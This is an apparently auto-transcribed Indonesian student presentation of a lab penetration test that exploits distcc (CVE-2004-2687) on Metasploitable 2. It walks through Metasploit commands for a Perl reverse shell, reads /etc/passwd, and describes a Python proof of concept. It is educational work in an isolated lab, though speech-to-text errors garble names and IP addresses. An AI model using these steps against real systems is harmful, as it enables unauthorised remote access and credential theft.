Assalamualaikum warahmatullahi wabarakatuh. Kami dari kelas TI 2A akan mempresentasikan tugas besar mata kuliah keamanan komputer. Sebelumnya, saya akan memperkenalkan diri. Saya Alfa Safira dengan NIM 2403026 dan saya Diana Kasinta dengan NIM 2403093. Jadi di sini saya akan mempresentasikan materi tentang pentest dan kemudian akan dilanjutkan teorinya oleh rekan saya Alfa Safira dan juga akan dijelaskan secara live kode program. Ini ada halaman utama yaitu penetration to test report pada kelompok 8. Kemudian ini ada daftar isinya. Yang pertama ada introduction, objektif. Laporan ini merupakan dokumentasi hasil praktikum pentest terhadap mesin Metasploitable 2 dalam lingkungan lab yang terkontrol dan sudah terisolasi. Kemudian dilakukan secara legal dan etis sebagai bagian dari kegiatan akademik untuk memahami celah keamanan pada layanan jaringan. Praktikum ini berfokus pada eksploitasi layanan distribusi si compiler yang berjalan pada port 3632. DIS-TCC adalah daemon yang digunakan untuk mendistribusikan proses kompilasi kode C++ ke beberapa mesin secara paralel. Pada konfigurasi yang tidak aman, layanan ini dapat dimanfaatkan untuk melakukan remote pada kode execution, yaitu menjelaskan perintah sistem dalam jarak jauh tanpa autentikasi. Berikut ada requirements, yaitu spesifikasi lingkungan yang digunakan dalam pengujian ini. Beberapa komponennya yaitu ada mesin target menggunakan Metasploitable 2, kemudian IP targetnya adalah 192.168.56.101. Untuk mesin penyerang kita menggunakan Kali Linux versi 6.18.12 AMD 64 byte. IP penyerang kita menggunakan 192.168.56.102. Kemudian jaringannya adalah host only yang terisolasi dari internet publik. Kemudian tools utama yang kita gunakan yaitu Nmap, Metasploit Framework, dan juga Netcat. Port target 3632 TCP TCCD. Kemudian high level summary, pengujian penetrasi berhasil mengidentifikasi dan mengeksploitasi kerentanan kritis pada layanan DIS-TCC yang berjalan di port 3632 pada mesin Metasploitable 2. Layanan ini berjalan tanpa mekanisme autentikasi dan menerima perintah eksekusi dari jaringan secara langsung, sehingga memungkinkan penyerang mendapatkan akses remote code execution dengan akses daemon yang awalnya diperoleh kemudian dimanfaatkan untuk melakukan enumerasi secara lebih mendalam sebagai bagian dari fase post exploitation. Kemudian rekomendasinya yaitu menonaktifkan layanan DIS-TCC yang tidak digunakan secara aktif untuk keperluan kompilasi terdistribusi. Jika DIS-TCC tetap digunakan, batasi akses hanya dari IP yang terpercaya menggunakan konfigurasi allow list pada file etc DIS-TCC host atau menggunakan firewall. Jika layanan DIS-TCC di bawah, akun pengguna dengan hak akses minimal principle of least privilege, bukan sebagai daemon dengan akses luas. Kemudian pantau dan audit log layanan secara
berkala untuk mendeteksi aktivitas mencurigakan. Kemudian ada metodologi yang digunakan dalam pengujian ini mengacu pada kerangka cyber kill chain untuk memetakan setiap tahapan secara struktur, yaitu reconnaissance, delivery, exploit, action on objective. Reconnaissance yaitu tahap awal pengujian yang dilakukan dengan menggunakan pemindaian port dan enumerasi layanan menggunakan Nmap dan mengidentifikasi layanan yang berjalan pada mesin target, termasuk versi perangkat lunaknya. Tools Nmap dengan flag min-sv Service Version Detection dan min-p untuk menentukan port spesifik. Kemudian ada delivery setelah layanan distisi teridentifikasi, modul eksploitasi yang sesuai disiapkan menggunakan Metasploit framework. Payload dikirimkan melalui protokol distisi yang terbuka tanpa autentikasi dengan tools Metasploit framework, MSV console, modul exploit, slice Unix slice MISC slice distisi underscore exec. Kemudian ada exploit, yaitu modul eksploitasi memanfaatkan kemampuan distisi untuk menerima dan mengeksekusi kode kompilasi dari jarak jauh. Payload disisipkan sebagai bagian dari job kompilasi sehingga daemon mengeksekusinya dengan hak aksesnya sendiri. Kemudian ada action on objective, di mana setelah akses shell diperoleh, maka dilakukan verifikasi identitas pengguna dan audit awal sistem untuk mengukur dampak dari kerentanan yang berhasil eksploitasi. Laporan ini disusun per host target dengan menyertakan ringkasan tabel kill chain dan daftar kerentanan beserta rekomendasinya dan referensi teknis. Struktur ini kemudian memudahkan pemahaman alur secara menyeluruh dari sudut pandang defender maupun auditor keamanan. Informasi gathering. Pemindaian awal dilakukan menggunakan Nmap untuk memakan semua port terbuka dan mesin target. Perintah yang dilakukan adalah Nmap min-sv min-p. Kemudian ketikkan IP-nya 192.168.1.10. Kemudian ada host IP-nya yaitu 192.168.56.101. Hostname-nya merupakan Metasploitable. Kemudian port open-nya ada 21, 22, 23, 25, 80, 139, 445, 3306, 36, 32, 54, 32 dan sebagainya. OS yang kita gunakan yaitu Linux 2624 16 dengan Ubuntu 804. Kemudian service and application yaitu menggunakan FS, FTPD, OpenSSH, Telnet, Samba, Apache dan MySQL, DistCCD, Postgres SQL dan lain-lainnya. Dari hasil pemindaian port 3632 teridentifikasi menjalankan layanan DistCCD. Ini menjadi target utama pengujian dikarenakan versi yang berjalan diketahui rentan terhadap eksekusi perintah jarak jauh. Kemudian ada penetration test Metasploitable 2 192.168.56.101 dengan hostname Metasploitable, IP address 192.168.56.101. Operating system kita menggunakan Linux 2.6.24 min16 server. Kemudian ada port targetnya yaitu 3632
flash TCP merupakan disk TCCD. Service kita menggunakan disk TCCD versi 1 GNU dengan versi 4.24, Ubuntu 4.24, kemudian di distribusi C++ compiler daemon. Payload yang digunakan yaitu CMD Unix Reverse Perl menggunakan via Metasploit Framework versi 6.4.124 Untuk credentials kita tidak diperlukan. Kemudian untuk proof kita menggunakan shell aktif digunakan sebagai UID 1 daemon dan JID menggunakan 1 yaitu daemon. Groups sama dengan 1 daemon pada mesin Metasploitable. Kemudian ada summary yang berhasil yaitu pemindaian port berhasil mengidentifikasi disk TCCD pada port 3632. Kemudian ada eksploitasi modul disk TCC berhasil menghasilkan sel aktif. Kemudian verifikasi identitas akses perintah ID berhasil dijalankan. Kemudian ada yang tidak berhasil, ada eskalasi hak akses ke root tidak berhasil pada tahap ini karena dikarenakan perlu teknik tambahan. Kemudian ada pivot ke layanan lain yang tidak dilakukan dalam scope praktikum ini. Yang selanjutnya ada kill chain detail. Kill chain pertama yaitu reconnaissance yaitu pemindaian yang digunakan Nmap untuk mengidentifikasi port terbuka dan versi layanan. Perintah Nmap min sv min p min 3632 dengan IP 192.168.1.10.1 dengan IP 192.168.1.101 hasil menunjukkan port 3632 flash TCP open dengan layanan disk TCCD. Kemudian ada weaponization session yaitu model exploit Metasploit untuk Unix MISC disk TCC access dipilih dikarenakan secara spesifik menargetkan kerentanan eksekusi perintah pada disk TCD. Payload CMD Unix Reverse menghasilkan reverse shell ke mesin penyerang. Kemudian ada delivery modul dikonfigurasi dengan airhost dengan IP target 192.168.56.101 dan lhost dengan IP 192.168.56.102. Kemudian payload dikirimkan melalui protokol distisi ke port 3632. Tidak ada autentikasi yang menghalangi pengiriman perintah. Kemudian ada exploit daemon disk TCCD menerima job komplikasi palsu yang mengandung perintah shell. Karena tidak ada validasi input, perintah tersebut dieksekusi langsung oleh sistem dengan hak akses daemon. Kemudian ada action on objective yaitu shell interaktif berhasil diperoleh. Perintah ID mengkonfirmasi akses sebagai UID 1 daemon yang menumerisasi yang dilakukan enumerasi sistem dasar uname min a untuk informasi kernel dan perintah directory home. Kemudian langkah-langkah eksploitasi yaitu tahap 1 mengidentifikasi layanan, yaitu langkah pertama memastikan layanan disk TCCD berjalan pada port 3632 dan mengidentifikasi versinya. 1. Buka terminal di Kali Linux, kemudian jalankan pemindaian port spesifik dengan nmap min sv min p 3632 dengan ID 192.168.56.101. Hasil port akan menunjukkan status open dengan layanan
DiskTCCD versi ini diketahui rentan terhadap RCE karena tidak memvalidasi input yang diterima. Tahap 2 yaitu vulnerability analysis. DiskTCCD dirancang untuk menerima pekerjaan komplikasi dari mesin lain di jaringan. Pada konfigurasi default Metasploitable 2, daemon ini tidak menerapkan pembatasan akses berdasarkan IP, sehingga siapapun yang berada di jaringan dapat mengirimkan perintah yang akan dieksekusi oleh daemon. Kemudian buka Metasploit Framework dengan menggunakan MSF Console. Kemudian cari modul yang relevan untuk DiskTCC dengan cara search DiskTCC. Hasil modul yaitu exploit Unix misc slice DiskTCC _exe akan muncul dalam daftar pencarian. Tahap 3 yaitu exploitation, yaitu mendapatkan akses ke shell. Kita di sini pertama-tama memilih modul eksploitasi menggunakan use exploit Unix misc slice DiskTCC _exit. Kemudian atur payload dengan menggunakan reverse per. Dipilih karena target tidak mendukung div dan TCP, yaitu set payload cmd unix reverse per. Kemudian atur alamat IP target dengan menggunakan set rhost 192.168.56.101. Atur IP mesin penyerang untuk menerima koneksi balik dengan menggunakan lhost 192.168.56.102. Untuk menjalankan kita menggunakan perintah exploit. Maka hasil yang diterima di terminal yaitu status reverse TCP handler on 192.168.56.102.24444 command shell session. Kemudian ada tahap 4 yaitu post exploitation verifikasi akses. Setelah shell diperoleh, dilakukan verifikasi akses dan enumerasi informasi sistem dengan cara verifikasi identitas pengguna aktif menggunakan ID, output UID 1 daemon, CID 1 daemon, kemudian group 1 daemon. Melihat informasi sistem menggunakan operasi target yaitu uname min a, maka keluarannya akan terdapat Linux Metasploitable versi 2.6.24 server. Kemudian melihat hostname target yaitu dengan mengetikkan hostname. Output aktual yaitu Metasploitable. Melihat daftar pengguna yang terdaftar dalam sistem, kita bisa menggunakan chat slice etc slice passwd. Output aktual menampilkan seluruh akun sistem termasuk root, daemon, MSF admin, Postgres, MySQL, Tomcat 55, DiskTCCD user service yang membuktikan akses baca file sistem sensitif berhasil diperoleh. Yang selanjutnya itu ada exploit atau vulnerabilities dan recommendation. Di sini ada severity-nya. Severity-nya itu tipikalnya kritikal. Untuk exploit dan vulnerability-nya itu DiskTCC Remote Code Execution atau CFA 2004-2687. Untuk deskripsinya, layanan DiskTCCD menerima dan mengeksekusi perintah dari jaringan tanpa autentikasi, memungkinkan penyerang menjalankan perintah sistem sembarang dari jarak jauh. Rekomendasinya, nonaktifkan layanan DiskTCCD jika tidak digunakan. Jika diperlukan, batas akses hanya dari IP terpercaya menggunakan allow list dan firewall. Yang selanjutnya itu ada severity yang high. DiskTCCD berjalan tanpa pembatasan host. Untuk deskripsinya, konfigurasi default mengizinkan koneksi dari semua IP dalam kurung 0.0.0.0 yang tidak ada whitelist host yang dikonfigurasi. Untuk rekomendasinya, tambahkan konfigurasi DiskTCC _host atau gunakan IP tables untuk membatasi akses port 3632 hanya dari IP compiler yang sah.
Untuk selanjutnya severity-nya itu medium dan exploit atau vulnerability-nya itu daemon berjalan dengan hak akses daemon user. Deskripsinya meskipun tidak berjalan sebagai root hak akses, daemon masih cukup untuk membaca file sistem, menjalankan program, dan berpotensi melakukan pivot ke layanan lain. Untuk rekomendasinya, konfigurasikan daemon untuk berjalan di bawah akun dengan hak akses yang lebih terbatas menggunakan Linux namespace atau container jika mungkin. Untuk referensinya menggunakan CFE 2004-2687 dari DistCC Remote Code Execution, dan ini link yang tertera. Yang kedua ada Metasploit modul, ada dari exploit unique misc DistCC_exec, dan ini linknya. Yang ketiga ada DistCC official documentation, ada dari DistCC GitHub. Yang keempat ada Nmap service detection, ada ini linknya. Terus yang selanjutnya ada maintaining access. Dalam konteks praktikum ini, tidak dilakukan pemasangan backdoor permanen pada sistem target karena hal tersebut berada di luar scope kegiatan akademik dan dapat merusak integritas lingkupan lab ternama bersama. Namun, dalam skenario pentest nyata atau penetration testing yang nyata, penyerang dapat mempertahankan akses dengan cara menanamkan reverse shell yang persisten atau menambahkan kunci SSH publik ke Directory Authentication case milik pengguna daemon. Teknik-teknik ini harus dibahas dan disepakati terlebih dahulu dalam rules of engagement bersama klien sebelum pelaksanaan. Untuk house cleaningnya, setelah sesi pengujian selesai, seluruh artefak yang dihasilkan selama proses eksploitasi dihapus dari sistem target untuk mengembalikan kondisi lab ke keadaan semula. Langkah-langkah pembersihan yang dilakukan yaitu yang pertama, sesi shell yang aktif ditutup menggunakan perintah exit. Yang kedua, tidak ada file yang ditulis ke sistem target selama pengujian ini. Yang ketiga, ada log aktivitas lokal di mesin Kali Linux disimpan sebagai dokumentasi praktikum. Yang keempat, ada mesin virtual yang dikembalikan ke snapshot awal menggunakan fitur snapshot pada VirtualBox atau VMware untuk memastikan lingkungan bersih untuk sesi berikutnya. Ada appendency A itu ringkasan perintah praktikum. Di sini ada ringkasan perintah praktikum yang sebelumnya dijelaskan oleh rekan saya. Ada nmap strip sf strip p 3632.192.168.56.101 yang fungsinya untuk memindai port 3632 dan mendeteksi versi layanan DistCCD pada target. Yang selanjutnya msif console membuka Metasploit framework versi 6.4.124 strip dev. Yang selanjutnya ada search DistCC mencari modul eksploitasi yang ditemukan exploit /unix /misc /DistCC exxc. Yang selanjutnya ada use exploit /unix /misc /DistCC exxc untuk memilih yang berfungsi untuk memilih modul exploit di DistCC. Yang selanjutnya ada set payload cmd /unix /reverse _Perl yang mengatur payload reverse shell berbasis Perl atau kompatibel dengan target. Yang selanjutnya ada set rhost 192.168.56.101 yang mengatur IP target untuk Metasploitable 2. Yang selanjutnya ada set lhost 192.168.56.102 yang sebagai berfungsi untuk mengatur IP penyerang Kali Linux untuk reverse shell. Ada exploit untuk menjalankan eksploitasi. Sesi 1 yang berhasil dibuka, ada ID untuk memverifikasi akses, UID sama dengan 1 daemon, GID sama dengan 1 daemon, dan group sama dengan 1 daemon. Uname A digunakan untuk info kernel Linux Metasploitable 2.6.24 16 server i686. Ada hostname untuk mengkonfirmasi hostname target adalah Metasploitable. Ada cat /etc/passwd menampilkan daftar akun pengguna sistem target. Di sini ada appendix B atau POC kode Metasploit 2 kode yang DistCC RCE dalam CFE 2004-2687. Berikut adalah script Python proof of concept sederhana yang menggambarkan mekanisme eksploitasi DistCC secara manual tanpa menggunakan Metasploit untuk tujuan pemahaman akademik. Di sini ada untuk user bin-nya itu menggunakan Python 3, terus ada POC DistCC Remote Code Execution, ada menggunakan CFE 2004-2687. Ada targetnya itu Metasploitable 2 menggunakan lab environment only. Untuk referensinya dari sini ada dari link yang tertera. Kemudian mengimport soket itu diimport dengan cara dev DistCC exec dengan menggunakan port atau cmd port dan cmd.
DSTCC ini menggunakan format .doti untuk job komplikasi dan kita sisipkan perintah shell pada file yang tidak divalidasi. Untuk selanjutnya kita jalankan payload dan di sini ada socket AF inet socket sockstream. Di sini ada menjalankan sconnect untuk mengkonekkan host dan port, ada send untuk mempayload dan ada respon untuk return respon dari Metasploit 2 POC kode ini. Yang selanjutnya di sini ada if name main, terus ada result DSTCC exe dengan alamat IP-nya itu menggunakan yang 192.168.561. Ininya 3632 ID dan print result, dan di sini untuk catatan skripnya itu di atas hanya dijalankan di lingkungan lab yang terkontrol terhadap mesin yang secara eksplisit diizinkan untuk diuji. Penggunaan di luar konteks ini adalah ilegal dan tidak etis. Yang selanjutnya kita jalankan Kali Linux. Nah, di sini saya akan menjalankan praktikum untuk langkah-langkah eksploitasi. Yang pertama kita ketik terlebih dahulu nmap sfp titik. Nanti coba kita salin saja. Nah, kalau udah kayak gini berarti nmap tersebut sudah terbuka dan sudah berstatus open dengan layanan DSTCCD, karena ini diketahui rentan terhadap RCE dan tidak memvalidasi input yang diterima. Yang selanjutnya itu di tahap kedua kita buka frameworknya. Tunggu dulu karena pas buka framework itu bisa dibilang agak lama. Ini tandanya sudah terbuka frameworknya. Kemudian kita ketik search DSTCC untuk mencari modul exploit yang kita butuhkan. Harusnya dia muncul di dalam daftar pencarian. Typo search DSTCC. Nah, di sini berarti sesuai dengan laporan praktikum yang dicari itu exploit, unique, misc, DSTCC, dan ini description DSTCC daemon command execution. Terus kita lanjut untuk tahap selanjutnya itu untuk pilih modul eksploitasi. Kita salin aja biar cepat. Kita jalankan. Setelah dijalankan, kita mengatur payload reverse Perl-nya. Karena di sini belum ada payload configuration-nya, jadi kita atur dulu untuk payload-nya. Karena sebelumnya si payload-nya belum ada dan dia belum mendukung dev dan TCP-nya. Kita jalankan. Nah, ini payload berarti udah mendukung. Kalau udah kayak gini, send unique reverse Perl. Yang selanjutnya kita atur alamat IP targetnya itu set rhost itu 192.168.5611. Terus untuk mesin penyerangnya itu agar menerima koneksi balik set lhost 192.168.5612. Kita jalankan eksploitasinya dengan cara exploit. Nah, kalau sudah begini,
Karena kan hasil aktual dari terminal yang diharapkan di laporan praktikum sudah sama persis dengan praktikum yang saya jalankan. Kita coba cari ID. Nah, ID kalau dicari itu output aktualnya UID 1 diamond, GID 1 diamond, dan group 1 diamond. Terus untuk melihat informasi sistem operasi target, kita ketik uname A. Nah, jika hasil output aktualnya sudah sama Linux Metasploit Table 2.6.2416 server sama seperti di laporan praktikum, kita jalankan untuk melihat hostname target. Ketik hostname, harusnya keluarnya tuh Metasploit Table. Nah, ini sudah sesuai. Terus kemudian kita lihat daftar pengguna yang terdaftar di sistem. Cek etc password. Nah, sini outputnya itu akan menampilkan seluruh sistem termasuk root, daemon, MSF, admin, Postgres, MySQL, Tomcat 55, DiskCD, Visual Service yang membuktikan bahwa akses baca file sistem itu sensitif. Meskipun sensitif, dia bisa diperoleh. Nah, kalau kayak gini berarti semuanya sudah terbaca. Jika ingin keluar, CTRL-C, run klik C, kemudian exit.